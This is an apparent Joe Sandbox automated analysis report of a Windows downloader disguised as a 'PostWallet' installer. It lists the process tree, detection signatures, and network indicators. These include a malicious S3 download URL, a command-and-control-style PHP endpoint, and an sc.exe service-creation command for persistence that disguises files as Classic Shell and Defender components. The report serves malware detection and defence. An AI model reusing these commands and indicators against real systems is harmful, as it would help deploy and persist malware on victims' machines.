Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00023948209303294#U00ac320302282349843984903.exe

Overview

General Information

Sample name:00023948209303294#U00ac320302282349843984903.exe
renamed because original name is a hash value
Original sample name:00023948209303294320302282349843984903.exe
Analysis ID:1404607
MD5:9e1e30202d950ce1f273eb2e8492f39b
SHA1:4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
SHA256:ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
Tags:exe
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contain functionality to detect virtual machines
Machine Learning detection for dropped file
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 00023948209303294#U00ac320302282349843984903.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC MD5: 9E1E30202D950CE1F273EB2E8492F39B)
    • Update.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • FilePost?a.exe (PID: 7232 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun MD5: 436CEDFA08F245AD52DD221BEC4480A4)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • FilePost?a.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" MD5: 436CEDFA08F245AD52DD221BEC4480A4)
          • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7448 cmdline: "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • rundll32.exe (PID: 7504 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: 889B99C52A60DD49227C5E485A016679)
              • rundll32.exe (PID: 7520 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
                • cmd.exe (PID: 7648 cmdline: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 7700 cmdline: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                • shutdown.exe (PID: 7932 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
                  • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\PostWallet\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.0.Update.exe.150000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ProcessId: 7700, ProcessName: sc.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllVirustotal: Detection: 17%Perma Link
          Source: C:\Program Files\Classic Shell\ClassicIE_64.dllVirustotal: Detection: 18%Perma Link
          Multi AV Scanner detection for submitted file
          Source: 00023948209303294#U00ac320302282349843984903.exeVirustotal: Detection: 8%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF61E40 CryptGenRandom,4_2_6CF61E40
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF61E00 CryptReleaseContext,4_2_6CF61E00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF61F30 CryptGenRandom,CryptReleaseContext,4_2_6CF61F30
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF61910 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,4_2_6CF61910
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF61A70 CryptAcquireContextA,GetLastError,CryptReleaseContext,4_2_6CF61A70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF9E680 CryptReleaseContext,4_2_6CF9E680
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zip1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\PolicyDefinitions.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\HISTORY.txtJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ExplorerL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\SkinsJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\IE Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Screen.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShell.chmJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\pack01.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWalletJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: unknownHTTPS traffic detected: 3.5.232.137:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000004.00000002.3858763537.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000008.00000002.3858762476.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.13.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: ClassicIE_64.exe.13.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenuDLL.pdb source: ClassicStartMenuDLL.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicShellUpdate\Release\ClassicShellUpdate.pdb source: ClassicShellUpdate.exe.13.dr
          Source: Binary string: MpCmdRun.pdb source: ClassicIE_64.exe.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb, source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\BasicInformation\x64\Release\BasicSomate.pdb source: ClassicIEDLL_64.dll.13.dr
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF93AFA FindFirstFileExW,4_2_6CF93AFA
          Source: C:\Windows\System32\rundll32.exeCode function: 13_2_00415080 FindFirstFileW,FindClose,13_2_00415080

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.5.232.137 443Jump to behavior
          Yara detected Generic Downloader
          Source: Yara matchFile source: Update.exe, type: SAMPLE
          Source: Yara matchFile source: 3.0.Update.exe.150000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\PostWallet\Update.exe, type: DROPPED
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /bucketTc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\System32\rundll32.exeCode function: 13_2_00815430 Sleep,SleepEx,URLDownloadToFileW,Sleep,13_2_00815430
          Source: global trafficHTTP traffic detected: GET /bucketTc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com
          Source: ClassicIE_64.dll.13.drString found in binary or memory: http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, ClassicStartMenuDLL.dll.13.dr, FilePost?a.exe.3.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: FilePost?a.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: Update.exe, 00000003.00000002.2060372901.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/PostWallet.nuspec
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/_rels/.rels
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/FilePost?a.exe
